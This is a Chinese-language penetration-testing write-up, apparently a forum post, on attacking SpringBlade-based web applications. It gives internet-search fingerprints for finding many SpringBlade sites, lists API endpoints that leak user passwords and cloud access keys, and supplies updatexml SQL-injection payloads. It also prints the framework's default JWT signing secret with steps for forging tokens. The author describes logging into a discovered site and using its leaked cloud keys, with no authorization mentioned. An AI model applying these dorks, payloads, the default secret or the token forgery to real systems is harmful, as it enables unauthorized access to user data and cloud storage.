?Springblade框架介紹：

SpringBlade是一個(gè)基于Spring Boot和Spring Cloud的微服務(wù)架構(gòu)框架，它是由商業(yè)級(jí)項(xiàng)目升級(jí)優(yōu)化而來(lái)的綜合型項(xiàng)目。

0x1 前言

最近跟一些大佬學(xué)習(xí)了blade的漏洞，所以自己總結(jié)了一下，在滲透測(cè)試過(guò)程中，遇到blade框架的時(shí)候，該有哪些滲透思路，Springblade是基于spring-boot開(kāi)發(fā)的，接口泄露、sql注入他也存在。

0x2 Spring-blade特征

特征1

看到一把劍沒(méi)有，這就是它的特征，可以將一個(gè)ico圖片，下載下來(lái)，在fofa、鷹圖上搜索，很多資產(chǎn)都是blade的

icon_hash="1047841028"

特征2

在頁(yè)面加載過(guò)程中，會(huì)出現(xiàn)以下的加載頁(yè)面，和最下方的https://bladex.vip，此時(shí)我們就可以將這個(gè)地址放到fofa上去擴(kuò)大資產(chǎn)

body="https://bladex.vip"

特征3

在路徑中若發(fā)現(xiàn)blade，這個(gè)字段，也基本可以確定是blade框架

/api/blade-user/info/api/blade-auth/oauth/captcha.....

0x3 發(fā)現(xiàn)資產(chǎn)

額，本來(lái)是像找一個(gè)可以注冊(cè)的站，然后通過(guò)注冊(cè)進(jìn)去，想不到隨便翻翻。。。。

直接把賬號(hào)密碼，寫(xiě)在頁(yè)面中。。。。

進(jìn)來(lái)之后，抓取數(shù)據(jù)包，說(shuō)明一嘴，在路徑中若看到blade-system，這個(gè)路徑也代表這個(gè)站就是blade框架

0x4 漏洞案列

4.1 接口泄露

正常情況下，應(yīng)該是/api/blade-system/，但很明顯開(kāi)發(fā)人員將前面的路徑改了，這樣有些人在使用掃描器批量掃資產(chǎn)的時(shí)候，就會(huì)錯(cuò)過(guò)這樣的站點(diǎn)

/oaApi/blade-system/menu/buttons

/oaApi/blade-system/user/user-list

泄露了大量用戶(hù)的姓名，密碼（也包括管理員的信息）

/oaApi/blade-resource/oss/list

泄露云服務(wù)器的accesskey、secrekey，直接去接管

這里我們使用OSS Browser工具，使用cname進(jìn)行連接，否者連接不上，登錄成功，但里面不存在任何的數(shù)據(jù)。

下載地址：https://github.com/aliyun/oss-browser

這里還有很多的泄露信息的接口，就不一一列舉了，我將自己收集的bladeapi接口,放到附件里面了，需要的師傅請(qǐng)到社區(qū)自取：https://bbs.zkaq.cn/t/31811.html。

/api/blade-system/user/user-list/api/blade-system/tenant/select/api/blade-develop/datasource/list/api/blade-resource/oss/list/api/blade-develop/datasource/list/api/blade-system/code/remove/api/blade-resource/oss/remove/api/blade-system/dict-biz/remove/authority/role/add/system/dict/add.......

4.2 SQL注入

/oaApi/blade-log/error/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1

e這個(gè)不存在這個(gè)漏洞

試了其他注入點(diǎn)，也不存在注入

/oaApi/blade-user/export-user?Blade-Auth=[jwt碼]&account=&realName=&1-updatexml(1,concat(0x5c,database(),0x5c),1)=1

4.3 jwt硬編碼

bladexisapowerfulmicroservicearchitectureupgradedandoptimizedfromacommercialproject

漏洞原因：開(kāi)發(fā)者在使用jwt進(jìn)行身份認(rèn)證時(shí)，并沒(méi)有對(duì)默認(rèn)的jwt密鑰進(jìn)行修改，導(dǎo)致黑客可以利用默認(rèn)的jwt密鑰去偽造jwt值，可以欺騙服務(wù)器獲取用戶(hù)權(quán)限等

教程：將上面的密鑰放到箭頭指示的位置，然后修改payload里的字段，因?yàn)榉?wù)器都是通過(guò)這個(gè)payload中的字段進(jìn)行鑒權(quán)的，所以通過(guò)修改payload中的字段，來(lái)達(dá)到偽造jwt欺騙服務(wù)器

將修改后的jwt字段，放回Blade-Auth中，放包，看是否回顯，若回顯，則證明存在jwt硬編碼。

不成功則會(huì)出現(xiàn)未授權(quán)

0x5 總結(jié)

結(jié)束，以上是我了解的blade框架的漏洞，暫時(shí)就知道這些漏洞，若后續(xù)有新發(fā)現(xiàn)的漏洞也會(huì)補(bǔ)上，謝謝師傅們觀(guān)看